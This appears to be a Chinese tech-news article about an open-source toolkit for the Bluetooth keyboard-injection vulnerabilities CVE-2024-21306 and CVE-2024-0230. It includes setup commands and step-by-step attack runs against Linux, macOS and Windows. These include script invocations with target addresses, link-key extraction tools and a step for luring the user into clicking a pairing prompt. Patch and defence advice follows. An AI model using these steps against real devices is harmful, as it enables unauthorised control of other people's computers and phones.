当前位置: 首页 > news >正文

CVE-2024-21306与CVE-2024-0230:Hi, My Name is Keyboard漏洞利用指南

CVE-2024-21306与CVE-2024-0230:Hi, My Name is Keyboard漏洞利用指南

【免费下载链接】hi_my_name_is_keyboard项目地址: https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboard

Hi, My Name is Keyboard项目是一个针对CVE-2024-21306与CVE-2024-0230等蓝牙键盘漏洞的开源工具集,提供了多种操作系统的键盘注入攻击演示。通过该项目,安全研究者可以深入了解蓝牙键盘配对机制中的安全缺陷,以及如何通过技术手段防范此类攻击。

漏洞原理:蓝牙键盘的隐形威胁 🚨

现代设备广泛依赖蓝牙键盘进行输入,但CVE-2024-21306与CVE-2024-0230漏洞暴露了蓝牙配对流程中的严重安全缺陷。攻击者可通过伪造蓝牙键盘设备,在无需用户确认的情况下强制配对并注入恶意指令,实现对目标设备的远程控制。

这类攻击主要利用以下漏洞点:

  • 零交互配对:部分系统在蓝牙开启时会自动接受键盘配对请求
  • 设备身份验证缺失:未能有效验证蓝牙设备的物理合法性
  • 链接密钥泄露:Magic Keyboard等设备存在链接密钥存储漏洞

环境准备:快速搭建测试平台 ⚙️

硬件要求

  • Ubuntu 22.04主机(推荐)
  • Broadcom蓝牙适配器(如Kinivo BCM20702A0)
  • 目标测试设备(Android/iOS/macOS/Linux/Windows)

依赖安装

# 更新系统 sudo apt-get update && sudo apt-get -y upgrade # 安装基础依赖 sudo apt install -y bluez-tools bluez-hcidump git \ python3-pip python3-setuptools \ libbluetooth-dev # 配置蓝牙兼容性模式 sudo sed -i "s|ExecStart=/usr/lib/bluetooth/bluetoothd|ExecStart=/usr/lib/bluetooth/bluetoothd --compat|g" /lib/systemd/system/bluetooth.service sudo systemctl daemon-reload sudo systemctl restart bluetooth # 安装Python依赖 git clone https://github.com/pybluez/pybluez.git cd pybluez && sudo python3 setup.py install python3 -m pip install pydbus # 编译bdaddr工具 cd ~ && git clone https://github.com/bluez/bluez.git cd bluez && gcc -o bdaddr tools/bdaddr.c src/oui.c -lbluetooth -I. sudo cp bdaddr /usr/local/bin/

代码获取

git clone https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboard cd hi_my_name_is_keyboard

跨平台攻击演示:实战操作指南 📱💻

Linux系统攻击演示

当Linux主机开启蓝牙并处于可发现状态时,攻击者可利用BlueZ协议栈漏洞实现键盘注入。下图展示了Ubuntu系统的蓝牙设置界面,此时设备正处于易受攻击状态:

攻击步骤:
  1. 确认目标Linux主机蓝牙处于可发现状态
  2. 执行注入脚本:
./keystroke-injection-android-linux.py -i hci1 -t 58:28:39:E6:AE:1C
  1. 脚本将自动完成设备伪装与配对,注入Tab键击10秒

macOS系统攻击演示

macOS系统在Magic Keyboard断开连接时存在短暂的安全窗口,攻击者可通过伪造键盘设备实现注入。下图展示了macOS系统在攻击过程中的屏幕状态变化:

攻击步骤:
  1. 确保目标Mac已配对Magic Keyboard并处于连接状态
  2. 执行注入脚本:
./keystroke-injection-macos.py -i hci1 -t 50:DE:06:A8:E1:CA -k 1C:57:DC:88:55:02
  1. 断开目标Magic Keyboard连接触发攻击
  2. 脚本将自动注入打开浏览器并执行搜索的指令

Windows系统攻击要点

Windows系统需要用户点击通知才能完成攻击流程,具体步骤如下:

  1. 确保目标Windows已配对蓝牙键盘并关闭该键盘
  2. 执行注入脚本:
./windows-poc.py -i hci0 -k 3C:A6:F6:EC:5B:ED -c 04:33:C2:19:CD:3B
  1. 诱导目标用户点击"添加设备"通知
  2. 用户关闭配对对话框后,脚本将注入Tab键击5秒

防御措施:保护你的设备安全 🛡️

系统层面防护

  • 及时更新系统

    • Android:升级至2023-12-05安全补丁级别
    • iOS:升级至17.2或更高版本
    • macOS:升级至14.2或更高版本
    • Linux:更新BlueZ至最新安全版本
  • 蓝牙使用规范

    • 仅在需要时开启蓝牙
    • 禁用自动配对功能
    • 开启蓝牙时避免将设备设为可发现状态

硬件层面防护

  • 使用带有物理开关的蓝牙设备
  • 定期更换蓝牙设备链接密钥
  • 考虑使用USB有线键盘替代蓝牙键盘

高级防护策略

  • 开启macOS的"锁定模式"(Lockdown Mode)
  • 配置Linux系统蓝牙白名单
  • 监控异常蓝牙连接请求

漏洞影响范围与修复状态 📊

受影响设备

操作系统受影响版本修复状态
Android4.2.2-14部分修复
iOS16-17.117.2已修复
macOS12-14.114.2已修复
LinuxBlueZ 5已发布补丁
Windows10/11部分缓解

受影响Apple外设

  • Magic Keyboard (A2450)
  • Magic Keyboard with Touch ID (A2449)
  • Magic Mouse (A1657)
  • 其他蓝牙输入设备

项目结构与核心文件 🔍

该项目包含多个平台的攻击演示脚本和工具模块:

  • 注入工具

    • keystroke-injection-android-linux.py - Android/Linux注入脚本
    • keystroke-injection-macos.py - macOS注入脚本
    • keystroke-injection-ios.py - iOS注入脚本
    • windows-poc.py - Windows注入脚本
  • 链接密钥提取工具

    • read-link-key-bluetooth.py - 蓝牙方式提取密钥
    • read-link-key-from-mac.py - Mac USB端口提取密钥
    • read-link-key-lightning.py - Lightning端口提取密钥
  • 核心模块

    • injector/agent.py - 蓝牙HID代理实现
    • injector/hid.py - HID设备模拟
    • injector/client.py - 蓝牙连接管理

总结与展望 🔮

CVE-2024-21306与CVE-2024-0230漏洞揭示了蓝牙输入设备生态中的基础性安全问题。Hi, My Name is Keyboard项目通过开源演示的方式,帮助安全社区更好地理解这些漏洞的原理与影响。

随着蓝牙设备的普及,类似的物理 proximity 攻击将持续对用户安全构成威胁。建议普通用户保持系统更新,安全研究者可基于本项目进一步探索蓝牙协议的安全边界,共同推动更安全的蓝牙生态建设。

注意:本项目仅用于安全研究目的,未经授权使用可能违反法律法规。

【免费下载链接】hi_my_name_is_keyboard项目地址: https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboard

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

http://www.jsqmd.com/news/1243523/

相关文章:

  • 合肥酒店住宿服务GEO城市合伙人选型推荐哪家靠谱:代理加盟前必须看清的技术、权益与收益全景 - 企业新闻快传
  • 理解平台的概念
  • 2026年,这家综合实力超强的吨袋源头厂家,究竟藏着啥秘密?
  • 2026 年新发布:阳春专业的酚醛环氧玻璃鳞片涂制造厂哪家专业,涂层升级:告别维护地狱的秘密武器-万腾防腐材料 - 品质体验官
  • 区块链技术在航班延误险中的智能合约应用实践
  • [特殊字符]企业级IM即时通讯系统|私有化部署与定制开发解决方案
  • 计算机Python毕设实战-基于 Python 的智能化无人零售超市管理信息系统 基于 Django 的无人超市运营管理系统设计【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • Jellium Desktop自适应播放设置:自动调整播放参数的完整指南
  • 2026乌兰察布黄金回收白银回收铂金回收工商备案可查全城上门回收旧金老店联系方式推荐
  • 2026AI电商创作平台排行榜:头部平台综合能力盘点 - 资讯快报
  • 未来展望:amiunique即将推出的高级指纹识别技术与功能路线图
  • wechatpay-apache-httpclient完全指南:10分钟上手微信支付APIv3开发
  • 打造个性化游戏库:RetroAssembly收藏与分类功能使用指南
  • 杭州GEO服务商九家技术路径与行业场景分析对比 - 资讯速览
  • 计算机Python毕设实战-智能文献收录、分类与引用管理平台 基于 Django 的学术文献资源管理系统【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • 2026实测免费去水印小程序怎么选,优缺点与隐私风险点整理 - 办公小帮手
  • GPU/TPU加速进化策略:evosax高性能计算指南与性能基准测试
  • 2026温州黄金回收白银回收铂金回收工商备案可查全城上门回收旧金老店联系方式推荐
  • 佳能TS8380,TS6360,G2810,TS3480,G3800,G4800,G3810,E608支持代码5B00,5B02,5B04,1700,1702,1704,P07,E08佳能清零软件。
  • 新一代IM即时通讯系统|打造企业专属安全通讯平台
  • StorageChooser未来路线图:即将推出的新功能与改进
  • 揭秘local.ai架构:Rust后端如何实现高效本地AI推理
  • OpenCut丨 外语小白如何翻译图片中的文字!
  • Qwen3.8-Max-Preview大模型PC端集成实战指南
  • Node API for .NET与TypeScript完美结合:自动生成类型定义的终极指南
  • 2026年7月宇舶中国官方网点地址及售后服务热线最新信息 - 亨得利官方服务中心
  • 光的叙事:当城市建筑从被照亮到被读懂
  • 2026 广州展厅设计公司实地考察选型清单:现场核验重点事项 - 优企甄选
  • 2026 年新消息:应县口碑好的桥架配件供应商哪家可靠,拆解桥架配件,原来效率低了这么多!-诚耀桥架 - 行业严选官
  • [PSOC Edge] 【英飞凌 Edgi Talk评测】1.小智Agent语音助手